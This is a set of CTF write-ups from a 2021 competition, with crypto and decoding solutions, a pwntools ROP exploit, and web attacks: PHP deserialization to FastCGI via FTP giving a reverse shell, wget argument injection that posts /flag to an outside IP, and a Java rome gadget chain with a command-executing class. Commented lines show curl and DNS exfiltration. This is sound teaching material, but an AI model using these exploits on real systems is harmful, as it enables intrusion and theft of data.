Longyuan "Battle the Epidemic" 2021 Cybersecurity Competition (陇原战“疫”2021网络安全大赛): selected writeups

WeChat official account: Th0r安全

CRYPTO

  • mostlycommon

Write a script:

from gmpy2 import *
from Crypto.Util.number import *

n=122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
c1=39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2=43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277

e1 = 65536
e2 = 270270
# the two public exponents are not coprime, so plain common-modulus recovery gives m^g, not m
g = gcd(e1, e2)
print(g)
# extended Euclid: s*e1 + t*e2 = g (one of s, t is negative; gmpy2 handles the modular inverse in pow)
_, s, t = gcdext(e1, e2)

# common modulus attack: c1^s * c2^t = m^(s*e1 + t*e2) = m^g (mod n)
M = pow(c1, s, n) * pow(c2, t, n) % n

# m^g may exceed n, so search M + k*n for a value that is an exact g-th power
for k in range(1000000):
    a = iroot(M + k*n, g)
    if a[1]:
        print(long_to_bytes(a[0]))
        break

Running it gives SETCTF{now_you_master_common_mode_attack}

MISC

  • soEasyCheckin

Play the Minecraft world in the attachment; after you defeat the Ender Dragon it gives you a picture.
The picture contains a ciphertext string: 11F9sACbBBBWKTiClYDtNF2yIEfThXdfIGPxF. Decoding it from base62 gives the flag:
SETCTF{Fi9ht1ng_3ItH_V1rUs}

  • 打败病毒

Downloading the attachment shows base32. Decoding it produces two garbled characters; remove them, base32-encode the result again and compare it with the attachment. This shows two characters that are not in the base32 alphabet: 0 and a second character (not shown here). Replace the second one with S, and for the 0 try the digits 2 through 7 in turn; 5 is the right one. Then base32-decode.
Next, base16-decoding reveals "Core Socialist Values" encoding.
Decoding the Core Socialist Values encoding gives:
SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4}

PWN

  • bbbaby

Use function 0 to overwrite the stack-overflow check function with main, so that when function 1 overflows the stack, execution still returns to main. Then leak libc, and finally use function 0 to overwrite atoi's GOT entry with system to get a shell. Exploit:

#!/usr/bin/env python
# coding=utf-8
from pwn import *

r = process('./qm')
elf = ELF('./qm')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug', os='linux', arch='amd64')

def choice(c):
    r.recvuntil("choice")
    r.sendline(str(c))

# function 1: the input with the stack overflow
def yichu(size, content):
    choice(1)
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.send(content)

# function 0: write 8 bytes to a chosen address
def edit(addr, content):
    choice(0)
    r.recvuntil(":")
    r.sendline(addr)
    r.recvuntil(":")
    r.send(content)

pop_rdi_ret = 0x400a03
pop_rsi_r15_ret = 0x400a01
main = 0x40090B

# ROP chain: puts(puts@got) to leak libc, then return to main
payload = p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main)

# redirect the stack-overflow check function to main so the overflow survives it
edit(str(0x601020), p64(main))
yichu(0x200, b'A' * 0x110 + p64(0) + payload)
choice(5)
choice(5)
leak = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = leak - libc.sym['puts']
system = libc_base + libc.sym['system']

# overwrite atoi@got with system; the next "choice" string is then passed to system
edit(str(0x601040), p64(system))
r.sendline(b'/bin/sh\x00')
r.interactive()

flag{fe64f4d6-bd04-4bb7-87e5-479efd3b86a5}

REVERSE

Download the attachment and open it in IDA. After searching for a long time, it turns out you can just press Shift+F12 to list the strings; the one that looks most like an MD5 hash is the answer:
fc5e038d38a57032085441e7fe7010b0

  • findme

Just XOR the two arrays:

# the two byte arrays extracted from the binary; the flag is their byte-wise XOR
a = [0xB7, 0x52, 0x85, 0xC1, 0x90, 0xE9, 0x07, 0xB8, 0xE4, 0x1A, 0xC3, 0xBD, 0x1D, 0x8E, 0x85, 0x46, 0x00, 0x21, 0x44,
     0xAF, 0xEF, 0x70, 0x32, 0xB5, 0x11, 0xC6]
b = [0xE4, 0x17, 0xD1, 0x82, 0xC4, 0xAF, 0x7C, 0xEC, 0x8C, 0x2B, 0xB0, 0xE2, 0x74, 0xBB, 0xDA,
     0x03, 0x32, 0x7E, 0x71, 0xDB, 0xBD, 0x13, 0x5F, 0x8C, 0x30, 0xBB]
for i in range(len(a)):
    print(chr((a[i] ^ b[i]) & 0xff), end="")

SETCTF{Th1s_i5_E2_5tRcm9!}

  • power

The keyword search shows the AES algorithm is used.
The binary contains both the ciphertext and the key.
So just decrypt directly:

from Crypto.Cipher import AES
from Crypto.Util.number import *

# 16-byte key and 32-byte ciphertext recovered from the binary
key = b'this_is_a_key!!!'
cipher = long_to_bytes(0x1030a9254d44937bed312da03d2db9adbec5762c2eca7b5853e489d2a140427b)
# AES-128 in ECB mode, no IV
aes = AES.new(key, AES.MODE_ECB)
text = aes.decrypt(cipher)
print(text)

flag{y0u_found_the_aes_12113112}

WEB

  • eaaasyphp

Constructing the deserialization chain is simple, so I will skip it. The obvious approach of writing a file does not seem to work; the directory is probably not writable. There is a Hint class that hints at phpinfo, so let's call phpinfo and take a look:

class Bypass {
    public function __construct(){
        $this->str4 = "phpinfo";
        $this->feng = new Esle();
    }

/*    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            //throw new Error("Error");
        }
    }*/
}
echo urlencode(serialize(new Bypass()));

phpinfo shows that FastCGI is in use. Combined with the sink used in the chain:

file_put_contents($this->filename, $this->data);

it is natural to think of using FTP passive mode to reach FastCGI.
The procedure follows the corresponding Blue Hat Cup challenge, so I won't go into detail. First send the malicious shared object over and have it written to /tmp/feng.so:

import base64
import requests

# base64 of the malicious shared object (the blob is elided here)
payload = "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"

url = "http://cf41a4b5-d2b7-490f-93c5-5b32adf39563.node4.buuoj.cn:81/"

# serialized chain: Bypass -> Welcome::__invoke -> Bunny::__toString -> file_put_contents
# Bunny carries only the filename, so its data is taken from $_REQUEST['data']
params = {
    "code": 'O:6:"Bypass":2:{s:4:"str4";O:7:"Welcome":1:{s:8:"username";O:5:"Bunny":1:{s:8:"filename";s:12:"/tmp/feng.so";}}s:4:"feng";O:4:"Esle":0:{}}'
}
data = {
    "data": base64.b64decode(payload)
}
r = requests.post(url=url, params=params, data=data)

Start the FTP server on your side, start nc, and then send the payload:

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}


class Bunny {
    public function __construct(){
        $this->filename="ftp://121.5.169.223:39444/1";
        $this->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%9C%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%16SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fuser.php%0B%09SCRIPT_NAME%2Fuser.php%0B%09REQUEST_URI%2Fuser.php%0F%29PHP_ADMIN_VALUEextension_dir+%3D+%2Ftmp%0Aextension+%3D+feng.so%0A%0F%11SERVER_SOFTWAREphp%2Ffastcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0C%21CONTENT_TYPEapplication%2Fx-www-form-urlencoded%0E%01CONTENT_LENGTH0%01%04%00%01%00%00%00%00%01%05%00%01%00%00%00%00");
    }

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    public function __construct(){
        $this->username = new Bunny();
    }
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {
    public function __construct(){
        $this->str4 = new Welcome();
        $this->feng = new Esle();
    }

/*    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            //throw new Error("Error");
        }
    }*/
}
echo urlencode(serialize(new Bypass()));

http://cf41a4b5-d2b7-490f-93c5-5b32adf39563.node4.buuoj.cn:81/?code=O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A27%3A%22ftp%3A%2F%2F121.5.169.223%3A39444%2F1%22%3Bs%3A4%3A%22data%22%3Bs%3A452%3A%22%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%9C%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%16SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fuser.php%0B%09SCRIPT_NAME%2Fuser.php%0B%09REQUEST_URI%2Fuser.php%0F%29PHP_ADMIN_VALUEextension_dir+%3D+%2Ftmp%0Aextension+%3D+feng.so%0A%0F%11SERVER_SOFTWAREphp%2Ffastcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0C%21CONTENT_TYPEapplication%2Fx-www-form-urlencoded%0E%01CONTENT_LENGTH0%01%04%00%01%00%00%00%00%01%05%00%01%00%00%00%00%22%3B%7D%7Ds%3A4%3A%22feng%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7D%7D
root@VM-0-6-ubuntu:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from 117.21.200.166 64381 received!
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell
www-data@a4c71746264f:~/html$ ls
ls
index.php
www-data@a4c71746264f:~/html$ cd /
cd /
www-data@a4c71746264f:/$ ls
ls
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
php.ini
proc
root
run
sbin
srv
sudoers
sys
tmp
usr
var
www-data@a4c71746264f:/$ cat /flag
cat /flag
flag{b483c338-32f1-48a9-819f-72e276607834}

  • CheckIN

A Go code-audit challenge. A quick read-through shows that /wget is the route to use, and it appears to have no authentication at all:

router.GET("/wget", getController)

func getController(c *gin.Context) {
    cmd := exec.Command("/bin/wget", c.QueryArray("argv")[1:]...)
    err := cmd.Run()
    if err != nil {
        fmt.Println("error: ", err)
    }
    c.String(http.StatusOK, "Nothing")
}

So wget can be run with arbitrary arguments; use it to send the flag out:

/wget?argv=1&argv=--post-file&argv=/flag&argv=http://121.5.169.223:39876/
root@VM-0-6-ubuntu:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from 117.21.200.166 37526 received!
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 121.5.169.223:39876
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

flag{88729834-1693-4af8-abba-0ebf6bd84ec2}
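
For comparison, a hardened version of the handler above, written here as an added example (not the challenge's code) using only the standard library instead of gin; the allowlisted host is an assumption. The argument must be a single absolute http(s) URL on an allowlisted host, wget options are refused, and `--` ends option parsing so the URL can never be read as a flag.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/url"
	"os/exec"
	"strings"
)

// allowedHosts is an assumed allowlist of download sources for this example.
var allowedHosts = map[string]bool{"updates.example.internal": true}

// safeWgetArgs validates the user-supplied "argv" values and returns the argv
// that may be handed to wget, or an error. The challenge handler passed the raw
// values through, which is why "--post-file /flag" worked above.
func safeWgetArgs(argv []string) ([]string, error) {
	if len(argv) != 1 {
		return nil, errors.New("exactly one URL argument is required")
	}
	raw := argv[0]
	if strings.HasPrefix(raw, "-") {
		return nil, errors.New("wget options are not accepted")
	}
	u, err := url.Parse(raw)
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") || u.Hostname() == "" {
		return nil, errors.New("only absolute http(s) URLs are accepted")
	}
	if !allowedHosts[u.Hostname()] {
		return nil, fmt.Errorf("host %q is not allowlisted", u.Hostname())
	}
	// "--" ends option parsing, so nothing after it is ever read as a flag.
	return []string{"--", u.String()}, nil
}

// getController is the hardened handler; authentication middleware is assumed
// to run in front of it (the challenge had none).
func getController(w http.ResponseWriter, r *http.Request) {
	args, err := safeWgetArgs(r.URL.Query()["argv"])
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	if err := exec.Command("/bin/wget", args...).Run(); err != nil {
		http.Error(w, "wget failed", http.StatusInternalServerError)
		return
	}
	fmt.Fprintln(w, "Nothing")
}

func main() {
	http.HandleFunc("/wget", getController)
	http.ListenAndServe("127.0.0.1:8080", nil)
}
```
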

  • EasyJaba

We are given a deserialization entry point, and it calls toString() on the result:

    @ResponseBody
    @RequestMapping({"/BackDoor"})
    public String BackDoor(@RequestParam(name = "ctf",required = true) String data) throws Exception {
        Set blacklist = new HashSet() {
            {
                this.add("java.util.HashMap");
                this.add("javax.management.BadAttributeValueExpException");
            }
        };
        Object object = null;
        byte[] b = Tool.base64Decode(data);
        InputStream inputStream = new ByteArrayInputStream(b);
        BlacklistObjectInputStream ois = new BlacklistObjectInputStream(inputStream, blacklist);

        try {
            object = ois.readObject();
        } catch (IOException var12) {
            var12.printStackTrace();
        } catch (ClassNotFoundException var13) {
            var13.printStackTrace();
        } finally {
            System.out.println("information:" + object.toString());
        }

        return "calm down....";
    }

But there is a blacklist. Let's look at pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.5.6</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.kyzy.ctf</groupId>
    <artifactId>ezjaba</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjaba</name>
    <description>Demo project for Spring Boot</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

The rome dependency stands out. A search confirms there is a gadget chain in it that gives RCE, but the chain needs HashMap, which is banned. In that chain, though, HashMap only serves to reach toString, and this challenge already calls toString explicitly, so it is enough to take a POC from the internet and adapt it:

package com.summer.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;

public class Test {

    public static class StaticBlock { }

    public static void main(String[] args) throws Exception {
        // base64 of the compiled Evil.class goes here (left as "xxx")
        byte[][] bytecodes = new byte[][]{Base64.getDecoder().decode("xxx")};

        // instantiate TemplatesImpl and set its private fields via reflection
        TemplatesImpl templatesimpl = new TemplatesImpl();
        Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes");
        fieldByteCodes.setAccessible(true);
        fieldByteCodes.set(templatesimpl, bytecodes);

        Field fieldName = templatesimpl.getClass().getDeclaredField("_name");
        fieldName.setAccessible(true);
        fieldName.set(templatesimpl, "test");

        Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory");
        fieldTfactory.setAccessible(true);
        fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());

        // ObjectBean.toString() ends up calling the Templates getters, which load the bytecode
        ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(objectBean1);
        byte[] sss = byteArrayOutputStream.toByteArray();
        out.close();
        String exp = Base64.getEncoder().encodeToString(sss);
        System.out.println(exp.replace("+","%2b"));
    }
}

It is still dynamic bytecode loading; the key question is what code the malicious class should execute.
I first got it working locally, but the remote never showed any output. I guessed it had no outbound network access, and asking the challenge author confirmed that it doesn't.
Then began an afternoon of trying to get output back without egress. I tried all sorts of odd things: DNS, the various Tomcat memory shells, Spring memory shells, and so on, and none of them worked... I don't know why either; I'm not good at Java, and I suppose I'll understand these things once I get around to learning them.
In the end I found this:

https://github.com/SummerSec/JavaLearnVulnerability/blob/master/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/SpringEcho.java

It doesn't really count as a memory shell; it simply uses the context and reflection to echo the result. I had actually considered following the Tomcat Filter approach (which I had just learned) to get hold of the Request and then the Response, not to register a Filter but to echo the result directly. I figured there would be something ready-made online, though, and kept looking for an existing POC instead of working on that, which turned out to be wasted effort.
Write Evil.java:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.net.InetAddress;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    // runs when TemplatesImpl instantiates the translet: fetch the current request and
    // response from Spring's RequestContextHolder by reflection and write the command
    // output back into the response (no outbound network needed)
    public Evil() throws Exception {
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}

// earlier attempts, left commented out in the file:
//    String[] cmd = {"/bin/sh","-c","curl http://172.16.177.48:39555/ -F file=@/flag"};
//    InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
//    byte[] bcache = new byte[1024];
//    int readSize = 0;
//    try(ByteArrayOutputStream outputStream = new ByteArrayOutputStream()){
//        while ((readSize =in.read(bcache))!=-1){
//            outputStream.write(bcache,0,readSize);
//        }
//        String result = outputStream.toString();
//        InetAddress.getByName("1m22164l.ns.dns3.cf.").isReachable(3000);
//    }
//
//    Runtime.getRuntime().exec("sh /tmp/feng");
//    catch (Exception ex) {
//        ex.printStackTrace();
//    }

Then compile it with javac, run `cat Evil.class | base64 -w 0`, paste that base64 string into the `byte[][] bytecodes = new byte[][]{Base64.getDecoder().decode(...)}` line of the generator above, generate the payload and send it. The command output is echoed back in the response.
